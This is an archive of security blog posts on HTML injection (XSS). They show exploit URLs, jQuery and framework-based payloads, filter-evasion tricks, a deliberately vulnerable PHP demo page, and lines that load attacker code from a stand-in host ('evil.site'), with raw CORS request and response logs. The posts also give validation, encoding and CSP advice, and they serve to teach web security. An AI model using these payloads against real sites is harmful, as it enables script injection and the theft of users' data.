Category Archives: html injection

Selector the Almighty, Subjugator of Elements

An ancient demon of web security skulks amongst all developers. It will live as long as there are people writing software. It is a subtle beast called by many names in many languages. But I call it Inicere, the Concatenator of Strings.

The demon’s sweet whispers of simplicity convince developers to commingle data with code — a mixture that produces insecure apps. Where its words promise effortless programming, its advice leads to flaws like SQL injection and cross-site scripting (aka HTML injection).

We have understood the danger of HTML injection ever since browsers rendered the first web sites decades ago. Developers naively took user-supplied data and wrote it into form fields, eliciting howls of delight from attackers who enjoyed demonstrating how to transform <input value="abc"> into <input value="abc"><script>alert(9)</script><"">

In response to this threat, heedful developers turned to the Litany of Output Transformation, which involved steps like applying HTML encoding and percent encoding to data being written to a web page. Thus, injection attacks become innocuous strings because the litany turns characters like angle brackets and quotation marks into representations like %3C and &quot; that have a different semantic identity within HTML.
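As a rough illustration of the litany, the sketch below applies HTML encoding and percent encoding to the payload from the form field example. The helper name encodeHtml is hypothetical; encodeURIComponent is the standard JavaScript function. Treat it as a minimal sketch, not a complete encoder for every HTML context.

```javascript
// Hypothetical helper: HTML-encode the characters that change meaning in markup.
function encodeHtml(text) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

const payload = 'abc"><script>alert(9)</script>';

// HTML encoding for values written into markup.
const forHtml = encodeHtml(payload);
// Percent encoding for values written into a URL component.
const forUrl = encodeURIComponent(payload);

console.log(forHtml);
console.log(forUrl);
```

Which encoding applies depends on where the value lands in the page, which is why the litany has more than one verse.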

But developers wanted to do more with their web sites. They wanted more complex JavaScript. They wanted the desktop in the browser. And as a consequence they’ve conjured new demons to corrupt our web apps. I have seen one such demon. And named it. For names have power.

Demons are vain. This one no less so than its predecessors. I continue to find it among JavaScript and jQuery. Its name is Selector the Almighty, Subjugator of Elements.

Here is a link that does not yet reveal the creature’s presence:


https://web.site/productDetails.html?id=OFB&start=15&source=search

Yet in the response to this link, the word “search” has been reflected in a .ready() function block. It’s a common term, and the appearance could easily be a coincidence. But if we experiment with several source values, we confirm that the web app writes the parameter into the page.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("search-wdth938");
});
</script>

A first step in crafting an exploit is to break out of a quoted string. A few probes indicate the site does not enforce any restrictions on the source parameter, possibly because the developers assumed it would not be tampered with — the value is always hard-coded among links within the site’s HTML.

After a few more experiments we come up with a viable exploit.


https://web.site/productDetails.html?productId=OFB&start=15&source=%22);%7D);alert(9);(function()%7B$(%22%23main-panel%22).addClass(%22search

We’ve followed all the good practices for creating a JavaScript exploit. It terminates all strings and scope blocks properly, and it leaves the remainder of the JavaScript with valid syntax. Thus, the page carries on as if nothing special has occurred.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("");});alert(9);(function(){$("#main-panel").addClass("search-wdth938");
});
</script>
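The concatenation behind this result can be sketched in a few lines. Both function names are hypothetical, and the real site's server-side code is unknown; the second function shows one possible way to emit the value as a JavaScript string literal instead of pasting it between quotes.

```javascript
// Hypothetical template that mirrors the vulnerable page: plain concatenation.
function renderVulnerable(source) {
  return '$("#main-panel").addClass("' + source + '-wdth938");';
}

// One possible fix: emit the value as a JavaScript string literal.
// JSON.stringify escapes quotes and backslashes; the extra replace keeps a
// literal "<" out of the script block so "</script>" cannot terminate it.
function renderEncoded(source) {
  const literal = JSON.stringify(source + "-wdth938").replace(/</g, "\\u003c");
  return '$("#main-panel").addClass(' + literal + ");";
}

// The source parameter from the exploit link, decoded as the server would see it.
const source = decodeURIComponent(
  "%22);%7D);alert(9);(function()%7B$(%22%23main-panel%22).addClass(%22search"
);

console.log(renderVulnerable(source));
console.log(renderEncoded(source));
```

The first line of output matches the injected script shown above; the second keeps the whole payload inside a single quoted string.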

There’s nothing particularly special about the injection technique for this vuln. It’s a trivial, too-common case of string concatenation. But we were talking about demons. And once you’ve invoked one by its true name it must be appeased. It’s the right thing to do; demons have feelings, too.

Therefore, let’s focus on the exploit this time, instead of the vuln. The site’s developers have already laid out the implements for summoning an injection demon, so why don’t we force Selector to do our bidding?

Web hackers should be familiar with jQuery (and its primary DOM manipulation feature, the Selector) for several reasons. Its misuse can be a source of vulns (especially so-called “DOM-based XSS” that delivers HTML injection attacks via DOM properties). jQuery is a powerful, flexible library that provides capabilities you might need for an exploit. And its syntax can be leveraged to bypass weak filters looking for more common payloads that contain things like inline event handlers or explicit <script> tags.

In the previous examples, the exploit terminated the jQuery functions and inserted an alert pop-up. We can do better than that.

The jQuery Selector is more powerful than the CSS selector syntax. For one thing, it may create an element. The following example creates an <img> tag whose onerror handler executes yet more JavaScript. (We’ve already executed arbitrary JavaScript to conduct the exploit; this just emphasizes the Selector’s power. It’s like a nested injection attack.)

$("<img src='x' onerror=alert(9)>")

Or, we could create an element, then bind an event to it, as follows:

$("<img src='x'>").on("error",function(){alert(9)});

We have all the power of JavaScript at our disposal to obfuscate the payload. For example, we might avoid literal < and > characters by taking them from strings within the page. The following example uses string indexes to extract the angle brackets from two different locations in order to build an <img> tag. (The indexes may differ depending on the page’s HTML; the technique is sound.)

$("body").html()[1]+"img"+$("head").html()[$("head").html().length-2]

As an aside, there are many ways to build strings from JavaScript objects. It’s good to know these tricks because sometimes filters don’t outright block characters like < and >, but block them only in combination with other characters. Hence, you could put string concatenation to use along with the source property of a RegExp (regular expression) object. Even better, use the slash representation of RegExp, as follows:

/</.source + "img" + />/.source
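The string-building tricks above run anywhere JavaScript does, so they are easy to try outside a browser. The sketch below shows three ways to assemble the same tag; the variable names are only illustrative.

```javascript
// Three ways to build "<img>" without writing the tag as one literal string.

// 1. The source property of RegExp literals, as described above.
const viaRegExp = /</.source + "img" + />/.source;

// 2. Character codes: 60 is "<" and 62 is ">".
const viaCharCode = String.fromCharCode(60) + "img" + String.fromCharCode(62);

// 3. Hexadecimal escape sequences inside a string literal.
const viaEscape = "\x3cimg\x3e";

console.log(viaRegExp, viaCharCode, viaEscape);
```

Any of these values can be handed to the Selector in place of the literal tag.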

Or just ask Selector to give us the first <img> that’s already on the page, bind an onerror handler to it, and change its src attribute. In the next example we use the Selector to obtain a collection of elements, then iterate through the collection with the .each() function. Since we specified the :first selector on img, the collection should only have one entry.

$("img:first").each(function(k,o){o.onerror=function(){alert(9)};o.src="x"})

Maybe you wish to booby-trap the page with a function that executes when the user decides to leave. The following example uses a Selector on the Window object:

$(window).unload(function(){alert(9)})

We have Selector at our mercy. As I’ve mentioned in other articles, make the page do the work of loading more JavaScript. The following example loads JavaScript from another origin. Remember to set Access-Control-Allow-Origin headers on the site you retrieve the script from. Otherwise, a modern browser will refuse to hand the cross-origin response to the page, because the Same Origin Policy applies unless CORS headers relax it.

$.get("http://evil.site/attack.js")

I’ll save additional tricks for the future. For now, read through jQuery’s API documentation. Pay close attention to:

  • Selectors, and how to name them.
  • Events, and how to bind them.
  • DOM nodes, and how to manipulate them.
  • Ajax functions, and how to call them.

Selector claims the title of Almighty, but like all demons its vanity belies its weakness. As developers, we harness its power whenever we use jQuery. Yet it yearns to be free of restraint, awaiting the laziness and mistakes that summon Inicere, the Concatenator of Strings, that in turn releases Selector from the confines of its web app.

Oh, what’s that? You came here for instructions to exorcise the demons from your web app? You should already know the Rite of Filtration by heart, and be able to recite from memory lessons from the Codex of Encoding. We’ll review them in a moment. First, I have a ritual of my own to finish. What were those words? Klaatu, bard and a…um…nacho.

=====

p.s. It’s easy to reproduce the vulnerable HTML covered in this article. But remember, this was about leveraging jQuery to craft exploits. If you have a PHP installation handy, use the following code to play around with these ideas. You’ll need to download a local version of jQuery or point to a CDN. Just load the page in a browser, open the browser’s development console, and hack away!

<?php
$s = isset($_REQUEST['s']) ? $_REQUEST['s'] : 'defaultWidth';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<!--
/* jQuery Selector Injection Demo
 * Mike Shema, http://deadliestwebattacks.com
*/
-->
<script src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script>
$(document).ready(function(){
  $("#main-panel").addClass("<?php print $s;?>");
})
</script>
</head>
<body>
<div id="main-panel">
<a href="#" id="link1" class="foo">a link</a>
<br>
<form>
<input type="hidden" id="csrf" name="_csrfToken" value="123">
<input type="text" name="q" value=""><br>
<input type="submit" value="Search">
</form>
<img id="footer" src="" alt="">
</div>
</body>
</html>

A Default Base of XSS

Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode misled developers about what was really being made “safe”, and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough to throw some code together, but not enough to understand the implications of blindly trusting data from the browser.

In some cases, the language tried to help developers: prepared statements are an excellent counter to SQL injection attacks. The catch is that developers actually have to use them. In other cases, the language’s quirks weakened code. For example, register_globals allowed attackers to define uninitialized values (among other things); and settings like magic_quotes might be enabled or disabled by a server setting, which made deployment unpredictable.

But the language alone isn’t to blame. Developers make mistakes, both subtle and simple. These mistakes inevitably lead to vulns like our ever-favorite HTML injection.

Consider the intval() function. It’s a typical PHP function in the sense that it has one argument that accepts mixed types and a second argument with a default value. (The base is used in the numeric conversion from string to integer):

int intval ( mixed $var [, int $base = 10 ] )

The function returns the integer representation of $var (or “casts it to an int” in more type-safe programming parlance). If $var cannot be cast to an integer, then the function returns 0. (Just for fun, if $var is an object type, then the function returns 1.)

Using intval() is a great way to get a “safe” number from a request parameter. Safe in the sense that the value should either be 0 or an integer representable by the platform running the code. Pesky characters like apostrophes or angle brackets that show up in injection attacks will disappear. At least, they should.

The problem is that you must be careful if you commingle usage of the newly cast integer value with the raw $var that went into the function. Otherwise, you may end up with an HTML injection vuln — and some moments of confusion in finding the problem in the first place.

The following code is a trivial example condensed from a web page in the wild:

<?php
$s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
$val = $n > 0 ? $s : '';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<form>
  <input type="text" name="s" value="<?php print $val;?>"><br>
  <input type="submit">
</form>
</body>
</html>

At first glance, a developer might assume this to be safe from HTML injection. Especially if they test the code with a simple payload:

http://web.site/intval.php?s="><script>alert(9)</script>

As a consequence of the non-numeric payload, intval() has nothing to cast to an integer, so the greater-than-zero check fails and the code path sets $val to an empty string. Such security is short-lived. Try the following link:

http://web.site/intval.php?s=19"><script>alert(9)</script>

With the new payload, intval() returns 19 and the original parameter gets written into the page. The programming mistake is clear: don’t rely on intval() to act as your validation filter and then fall back to using the original parameter value.
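The same pattern is easy to reproduce outside PHP. The sketch below is an analogy, not the page’s code: it assumes JavaScript’s parseInt() as a stand-in for intval(), since both accept a leading run of digits and ignore whatever follows. The function names are hypothetical.

```javascript
// Assumption: parseInt() stands in for PHP's intval(); both accept a numeric prefix.

// Mirrors the mistake: validate the converted number, then return the raw input.
function flawed(raw) {
  const n = parseInt(raw, 10);
  return n > 0 ? raw : "";
}

// Mirrors the fix: only the converted value ever leaves the function.
function corrected(raw) {
  const n = parseInt(raw, 10);
  return n > 0 ? String(n) : "";
}

const probe = '19"><script>alert(9)</script>';
console.log(flawed('"><script>alert(9)</script>')); // empty string: no numeric prefix
console.log(flawed(probe));                         // the raw payload comes back intact
console.log(corrected(probe));                      // "19"
```

The flawed version passes the simple test and fails the one that matters.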

Since we’re on the subject of PHP, we’ll take a moment to explore some nuances of its parameter handling. The following behaviors have no direct bearing on the HTML injection example, but you should be aware of them since they could come in handy for different situations.

One idiosyncrasy of PHP is the relation of URL parameters to superglobals and arrays. Superglobals are request variables like $_GET, $_POST, and $_REQUEST that contain arrays of parameters. Arrays are actually containers of key/value pairs whose keys or values may be extracted independently (they are implemented as an ordered map).

It’s the array type that leads to surprising results for developers. Surprise is an undesirable event in secure software. With this in mind, let’s return to the example. The following link has turned the s parameter into an array:

http://web.site/intval.php?s[]=19

The sample code will print Array in the form field because intval() returns 1 for a non-empty array.

We could define the array with several tricks, such as an indexed array (i.e. integer indices):

http://web.site/intval.php?s[0]=19&s[1]=42
http://web.site/intval.php?s[0][0]=19

Note that we can’t pull off any clever memory-hogging attacks using large indices. PHP won’t allocate space for missing elements since the underlying container is really a map.

http://web.site/intval.php?s[0]=19&s[4294967295]=42

This also implies that we can create negative indices:

http://web.site/intval.php?s[-1]=19

Or we can create an array with named keys:

http://web.site/intval.php?s["a"]=19
http://web.site/intval.php?s["<script>"]=19

For the moment, we’ll leave the “parameter array” examples as trivia about the PHP language. However, just as it’s good to understand how a function like intval() handles mixed-type input to produce an integer output, it’s good to understand how a parameter can be promoted from a single value to an array.

The intval() example is specific to PHP, but the issue represents broader concepts around input validation that apply to programming in general:

First, when passing any data through a filter or conversion, make sure to consistently use the “new” form of the data and throw away the “raw” input. If you find your code switching between the two, reconsider why it apparently needs to do so.

Second, make sure a security filter inspects the entirety of a value. This covers things like making sure validation regexes are anchored to the beginning and end of input, or being strict with string comparisons.

Third, decide on a consistent policy for dealing with invalid data. The intval() is convenient for converting to integers; it makes it easy to take strings like “19”, “19abc”, or “abc” and turn them into 19, 19, or 0. But you may wish to treat data that contains non-numeric characters with more suspicion. Plus, “fixing up” data like “19abc” into 19 is hazardous when applied to strings. The simplest example is stripping a word like “script” to defeat HTML injection attacks — it misses a payload like “<scrscriptipt>”.
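The second and third points can be sketched briefly. This is an illustration in JavaScript with hypothetical helper names, not a drop-in validator: it contrasts an unanchored pattern with an anchored one, and shows how a “fix up” that strips a word can rebuild the very string it meant to remove.

```javascript
// Unanchored: matches as long as digits appear somewhere in the value.
const unanchored = /[0-9]+/;
// Anchored: the entire value must consist of digits.
const anchored = /^[0-9]+$/;

// Hypothetical strict parser: reject anything that is not purely numeric.
function parseStrictInt(raw) {
  return anchored.test(raw) ? Number(raw) : null;
}

// Naive "fix up": strip the word and hope for the best.
function stripScript(raw) {
  return raw.replace(/script/gi, "");
}

console.log(unanchored.test('19"><script>')); // true: the filter saw only the prefix
console.log(parseStrictInt('19"><script>'));  // null: rejected outright
console.log(stripScript("<scrscriptipt>"));   // "<script>": the filter rebuilt the tag
```

Rejecting the suspicious value is simpler to reason about than repairing it.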

We’ll end here. It’s time to convert some hours into much-needed sleep.

On a Path to HTML Injection

URLs guide us through the trails among web apps. We follow their components — schemes, hosts, ports, querystrings — like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.

And developers must recognize how those crumbs lure dangerous beasts to their sites.

The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (a.k.a. cross-site scripting) payloads into querystring parameters.

But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

There’s no querystring parameter to test, but there are still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.

We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:

https://web.site/en/dir/o/80/loch%22onmouseover=alert(9);%22

The app neglects to filter the payload although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />

However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

Please tell us (us@web.site) how and on which page this error occurred.

The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.

Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity. Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:

https://web.site/en/dir/o/80/loch"onmouseover=$.get("//evil.site/");"

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.

We could further obfuscate the payload in case some other kind of filter is present:

https://web.site/en/dir/o/80/loch"onmouseover=$["get"]("//evil.site/");"
https://web.site/en/dir/o/80/loch"onmouseover=$["g"%2b"et"]("htt"%2b"p://"%2b"evil.site/");"
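To see why these spellings are interchangeable, and why a pattern-matching filter might miss them, consider the following sketch. It runs without a browser, so a plain object named lib stands in for jQuery’s $; the blacklist is a hypothetical example of a filter, not the one used by the site.

```javascript
// Stand-in for a library object such as jQuery's $ (assumption: no DOM here).
const lib = { get: (url) => "GET " + url };

// Hypothetical blacklist that only knows the textbook payloads.
const blacklist = /<script|alert\(|\$\.get|https?:\/\//i;
function naiveFilter(value) {
  return !blacklist.test(value); // true means "looks fine, let it through"
}

const plain = '$.get("http://evil.site/")';
const obfuscated = '$["g"+"et"]("htt"+"p://"+"evil.site/")';

// Dot notation and bracket notation resolve to the same property,
// and concatenated fragments produce the same argument.
const direct = lib.get("http://evil.site/");
const indirect = lib["g" + "et"]("htt" + "p://" + "evil.site/");

console.log(naiveFilter(plain));      // false: blocked
console.log(naiveFilter(obfuscated)); // true: passes the filter
console.log(direct === indirect);     // true: same call either way
```

The filter matches text; the browser evaluates expressions. Only one of them decides what runs.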

Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other: effective validation prevents malicious payloads from entering an app, and correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.

Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

  • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
  • Blacklisting often fails because developers have a poor understanding of, or a limited imagination for, how exploits are crafted. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking alert or <script>.

Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app. Be careful, lest they eat a few along the way.
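A minimal sketch of the two countermeasures applied to a URL path follows. Everything in it is an assumption for illustration: the function names, the rule that path segments are short alphanumeric tokens, and the way the language link is assembled. The point is the pairing of validation at the door and encoding at the point of output.

```javascript
// Assumption: path segments on this hypothetical site are short alphanumeric tokens.
const SEGMENT = /^[A-Za-z0-9_-]{1,64}$/;

// Validation: every segment of the decoded path must match the allowlist.
function isValidPath(path) {
  const segments = path.split("/").filter((s) => s !== "");
  return segments.length > 0 && segments.every((s) => SEGMENT.test(s));
}

// Output encoding for a quoted HTML attribute or text node.
function encodeAttr(text) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Encode at the point of output even if validation ran earlier.
function languageLink(lang, path, label) {
  return '<a href="' + encodeAttr("/" + lang + path) + '">' + encodeAttr(label) + "</a>";
}

const attack = '/dir/o/80/loch"onmouseover=alert(9);"';
console.log(isValidPath("/en/dir/o/80/loch")); // true
console.log(isValidPath("/en" + attack));      // false
console.log(languageLink("de", attack, "Deutsch"));
```

If either function is skipped on one code path, the other still stands in the way.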

DRY Fiend (Conjuration/Summoning)

In 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could use the “Thieves’ Cant” to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of safety. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)

Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how the Duke of Gloucester (Humphrey, the king’s uncle and Lord Protector) defends his treatment of certain subjects, with two notable exceptions:

Unless it were a bloody murderer,

Or foul felonious thief that fleec’d poor passengers,

I never gave them condign punishment.

Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.

Well, hackers code, too.

The most boring of HTML injection examples is to display an alert() message. The second most boring is to insert the document.cookie value into a request. But this is the era of HTML5 and roses; hackers need look no further than a vulnerable Same Origin to find useful JavaScript libraries and functions.

There are two important reasons for taking advantage of DRY in a web hack:

  1. Avoid incompetent blacklists (which is really a redundant term).
  2. Leverage code that already exists.

Keep in mind that none of the following hacks is a flaw in its respective JavaScript library. The target is assumed to have an HTML injection vulnerability; our goal is to take advantage of code already present on the hacked site in order to minimize our effort.

For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:

angular.bind(self, alert, 9)()

In Ember.js the payload might look like:

Ember.run(null, alert, 9)

The pervasive jQuery might have a string like:

$.globalEval("alert(9)")

And the Underscore library might be leveraged with:

_.defer(alert, 9)

These are nice tricks. They might seem to do little more than offer fancy ways of triggering an alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.
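Stripped of their library names, helpers like these boil down to “call this function with these arguments”. The sketch below shows rough plain-JavaScript equivalents, with a hypothetical record() function standing in for alert() so it runs outside a browser. It is an approximation of what such helpers do, not a description of any library’s internals.

```javascript
// Stand-in for alert() so the sketch runs outside a browser.
const calls = [];
const record = (value) => { calls.push(value); };

// Bind-then-invoke, roughly what a bind helper followed by () amounts to.
record.bind(null, 9)();

// Invoke with an argument list, roughly what a "run this" helper amounts to.
record.apply(null, [9]);

// Indirect lookup, so the function name never appears as a bare identifier.
const scope = { record };
scope["rec" + "ord"](9);

console.log(calls); // three recorded calls, each with the value 9
```

A filter that looks for a function name followed by a parenthesis sees none of these.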

More importantly, these libraries provide the means to load — and execute! — JavaScript from a different origin. After all, browsers don’t really know the difference between a CDN and a malicious domain.

The jQuery library provides a few ways to obtain code:

$.get('//evil.site/') 
$('#selector').load('//evil.site')

Prototype has an Ajax object. It will load and execute code from a call like:

new Ajax.Request('//evil.site/')

But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.
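The browser’s decision can be approximated in a few lines. This is a simplified model with a hypothetical function name: it ignores details such as restrictions on Content-Type values, and it only captures the rule that an unusual method or a non-safelisted header forces a pre-flight.

```javascript
// Simplified model of when a cross-origin XHR needs a CORS pre-flight.
// Assumption: Content-Type value restrictions and other edge cases are ignored.
const SIMPLE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFELISTED_HEADERS = new Set([
  "accept",
  "accept-language",
  "content-language",
  "content-type",
]);

function needsPreflight(method, headerNames) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return true;
  // Any author-set header outside the safelist forces a pre-flight.
  return headerNames.some((name) => !SAFELISTED_HEADERS.has(name.toLowerCase()));
}

// Prototype's Ajax.Request adds custom X- headers, so both of these pre-flight.
console.log(needsPreflight("POST", ["X-Requested-With", "X-Prototype-Version", "Accept"])); // true
console.log(needsPreflight("GET", ["X-Requested-With"]));                                   // true
// A bare GET with only safelisted headers does not.
console.log(needsPreflight("GET", ["Accept"]));                                             // false
```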

In the Prototype Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link we’ll call http://web.site/xss_vuln.page.

OPTIONS http://evil.site/ HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Origin: http://web.site
Access-Control-Request-Method: POST
Access-Control-Request-Headers: x-prototype-version,x-requested-with
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-length: 0

As someone with influence over the content served by evil.site, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
Access-Control-Allow-Origin: http://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
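The header logic on evil.site does not need to be elaborate. The sketch below is one hypothetical way to compute it: the function name and the lower-cased request header object are assumptions, and the real responses above came from PHP rather than JavaScript.

```javascript
// Hypothetical handler logic for the attacker-controlled evil.site.
// Input: request headers as an object with lower-cased names.
function corsHeaders(requestHeaders) {
  const headers = {
    // Echo the requesting origin so the browser accepts the response.
    "Access-Control-Allow-Origin": requestHeaders["origin"],
    "Access-Control-Allow-Methods": "GET, POST",
  };
  const requested = requestHeaders["access-control-request-headers"];
  if (requested) {
    // Approve whatever custom headers the pre-flight asked about.
    headers["Access-Control-Allow-Headers"] = requested;
  }
  return headers;
}

const preflight = {
  origin: "http://web.site",
  "access-control-request-method": "POST",
  "access-control-request-headers": "x-prototype-version,x-requested-with",
};
console.log(corsHeaders(preflight));
```

Echoing the request back is sloppy practice for a legitimate site, which is exactly why it suits an attacker who wants every pre-flight to succeed.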

With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom X- headers.)

POST http://evil.site/HWA/ch2/cors_payload.php HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://web.site/HWA/ch2/prototype_xss.php
Content-Length: 0
Origin: http://web.site
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
X-Powered-By: PHP/5.3.26
Access-Control-Allow-Origin: http://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Access-Control-Max-Age: 86400
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

alert(9);

Okay. So, it’s another alert() message. I suppose I’ve repeated myself enough on that topic for now.

It should be noted that Content Security Policy just might help you in this situation. The catch is that you need to have architected your site to remove all inline JavaScript. That’s not always an easy feat. Even experienced developers of major libraries like jQuery are struggling to create CSP-compatible content.
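For a sense of what such a policy looks like, here is a sketch that assembles a Content-Security-Policy header value. The directive choices are assumptions for a hypothetical web.site that loads jQuery from the CDN used in the earlier demo page; a real policy has to be fitted to the site’s actual resources.

```javascript
// Hypothetical policy: scripts only from the site itself and the jQuery CDN,
// and XHR connections only back to the site. No 'unsafe-inline' or
// 'unsafe-eval', so inline script blocks and event handler attributes won't run.
const directives = {
  "default-src": ["'self'"],
  "script-src": ["'self'", "https://code.jquery.com"],
  "connect-src": ["'self'"],
};

// Join each directive name with its sources, separated by semicolons.
function buildCsp(policy) {
  return Object.entries(policy)
    .map(([name, sources]) => name + " " + sources.join(" "))
    .join("; ");
}

const headerValue = buildCsp(directives);
console.log("Content-Security-Policy: " + headerValue);
```

Under a policy like this, the injected onmouseover attribute and the request to evil.site would both be refused by the browser, provided the site itself no longer depends on inline script.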
Nevertheless, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% chance to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.

And the price for failure? Well, it turns out condign punishment has its own API.

Two Hearts That Beat As One

A common theme among injection attacks that manifest within a JavaScript context (e.g. <script> tags) is that proper payloads preserve proper syntax. We’ve belabored the point of this dark art with such dolorous repetition that even Professor Umbridge might approve.

We’ve covered the most basic of HTML injection exploits, exploits that need some tweaking to bypass weak filters, and different ways of constructing payloads to preserve their surrounding syntax. The typical process is to choose a parameter (or a cookie!), find if and where its value shows up in a page, then hack the page. It’s a single-minded purpose against a single injection vector.

Until now.

It’s possible to maintain this single-minded purpose, but to do so while focusing on two variables. This is an elusive beast of HTML injection in which an app reflects more than one parameter within the same page. It gives us more flexibility in the payloads, which sometimes helps evade certain kinds of patterns used in input filters or web app firewall rules.

